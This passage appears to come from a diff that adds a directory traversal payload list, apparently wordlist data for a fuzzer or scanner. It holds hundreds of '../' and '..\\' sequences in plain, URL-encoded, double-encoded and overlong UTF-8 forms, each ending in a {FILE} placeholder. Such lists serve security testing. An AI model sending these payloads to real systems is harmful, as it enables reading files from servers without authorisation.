+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
